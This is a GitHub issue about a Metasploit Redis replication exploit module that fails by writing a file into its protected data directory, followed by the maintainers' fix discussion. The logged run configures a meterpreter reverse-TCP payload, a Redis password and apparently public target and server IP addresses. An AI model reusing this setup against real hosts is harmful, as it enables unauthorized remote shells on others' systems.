rapid7
redis_replication_cmd_exec: write to data/exploits/redis/module.c fails due insufficient permissions
[] Started reverse TCP handler on 192.168.190.128:4444 [-] 202.91.247.216:6379 - Exploit failed: Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master. [] Exploit completed, but no session was created. msf6 exploit(linux/redis/redis_replication_cmd_exec) > set SRVHOST 185.59.221.44 SRVHOST => 185.59.221.44 msf6 exploit(linux/redis/redis_replication_cmd_exec) > run
[] Started reverse TCP handler on 192.168.190.128:4444 [-] 202.91.247.216:6379 - Exploit failed: Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c [] Exploit completed, but no session was created. msf6 exploit(linux/redis/redis_replication_cmd_exec) > debug Please provide the below information in any Github issues you open. New issues can be opened here https://github.com/rapid7/metasploit-framework/issues/new/choose ENSURE YOU HAVE REMOVED ANY SENSITIVE INFORMATION BEFORE SUBMITTING!
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/core]
LHOST=eth0
[framework/ui/console]
ActiveModule=exploit/linux/redis/redis_replication_cmd_exec
[linux/redis/redis_replication_cmd_exec]
PAYLOAD=linux/x64/meterpreter/reverse_tcp
SRVPORT=6379
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SRVHOST=185.59.221.44
ListenerComm=
SSL=false
SSLCompression=false
SSLCipher=
TCP::max_send_size=0
TCP::send_delay=0
RHOSTS=202.91.247.216
RPORT=6379
SSLVersion=Auto
SSLVerifyMode=PEER
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
ShowProgress=true
ShowProgressPercent=10
HTTP::no_cache=false
HTTP::chunked=false
HTTP::header_folding=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
URIHOST=
URIPORT=
SendRobots=false
CMDSTAGER::FLAVOR=auto
CMDSTAGER::DECODER=
CMDSTAGER::TEMP=
CMDSTAGER::SSL=false
FileDropperDelay=
PASSWORD=foobared
READ_TIMEOUT=2
CUSTOM=true
RedisModuleInit=
RedisModuleTrigger=
RedisModuleName=
LHOST=
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependFork=false
PrependSetresuid=false
PrependSetreuid=false
PrependSetuid=false
PrependSetresgid=false
PrependSetregid=false
PrependSetgid=false
PrependChrootBreak=false
AppendExit=false
MeterpreterDebugLevel=0
RemoteMeterpreterDebugFile=
History
The following commands were ran during the session and before this issue occurred:
Collapse
0 search redis
1 use exploit/linux/redis/redis_replication_cmd_exec
2 options
3 set RHOSTS xx
4 run
5 set RHOSTS xx
6 run
7 setg LHOST eth0
8 run
9 set SRVHOST 185.59.221.44
10 run
11 debug
Framework Errors
The following framework errors occurred before the issue occurred:
Collapse
[03/10/2021 03:07:37] [e(0)] core: Failed to connect to the database: No database YAML file
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/10/2021 03:14:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: RHOSTS.
[03/10/2021 03:15:13] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: LHOST.
[03/10/2021 03:16:17] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master. - Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.
[03/10/2021 03:17:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c - Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c
Web Service Errors
The following web service errors occurred before the issue occurred:
Collapse
msf-ws.log does not exist.
Framework Logs
The following framework logs were recorded before the issue occurred:
Collapse
[03/10/2021 03:07:37] [e(0)] core: Failed to connect to the database: No database YAML file
[03/10/2021 03:07:37] [d(0)] core: Created user based module store
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/10/2021 03:14:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: RHOSTS.
[03/10/2021 03:15:13] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: LHOST.
[03/10/2021 03:16:17] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master. - Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.
[03/10/2021 03:17:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c - Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c
Web Service Logs
The following web service logs were recorded before the issue occurred:
Collapse
msf-ws.log does not exist.
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 6.0.31-dev
Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 msf6 exploit(linux/redis/redis_replication_cmd_exec) > run
[] Started reverse TCP handler on 192.168.190.128:4444 [-] 202.91.247.216:6379 - Exploit failed: Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c [] Exploit completed, but no session was created.
┌──(root💀kali)-[/home/kali] └─# chmod 777 /usr/share/metasploit-framework/data/exploits/redis/module.c chmod: cannot access '/usr/share/metasploit-framework/data/exploits/redis/module.c': No such file or directory
Bug exists here:
https://github.com/rapid7/metasploit-framework/blob/17ef194c52ff4e5adb8349d67879e910a063a062/modules/exploits/linux/redis/redis_replication_cmd_exec.rb#L231-L237
The module attempts to write to the Metasploit ./data/ directory.
@bcoles I would like to work on this issue
All yours. I don't think anyone else is working on it.
I suggest performing all changes to the template erb file in memory rather than writing files out to the data directory. I haven't looked at the module code, so I'm not sure if there's any reason why this data has to be written to disk. Writing to data is generally frowned upon (if not forbidden outright). If files need to be stored somewhere they're usually stored somewhere under ~/.msf4/ in the user's home directory.
@bcoles @hack3r-0m
I have taken a look at this.
The data is written to disk so that the resulting file can then used by a Makefile. This behaviour is triggered when the user wishes to use a custom payload.
I am thinking that the lowest risk approach may be to do the following:
- Copy the contents found here to a new directory within
Msf::Config.local_directory. - Build the exploit using the existing Makefile.
- Remove any files that were copied in step (1) (or perhaps optionally leave these behind for debugging purposes).
Is there any of the above that does not sound like a good idea?
PS I notice that there does not appear to be test coverage for this exploit, so I may see if there is some way to introduce some tests before starting.
For those of you coming here looking for a quick fix:
sudo chown -R kali:kali /usr/share/metasploit-framework/data/exploits/redis/
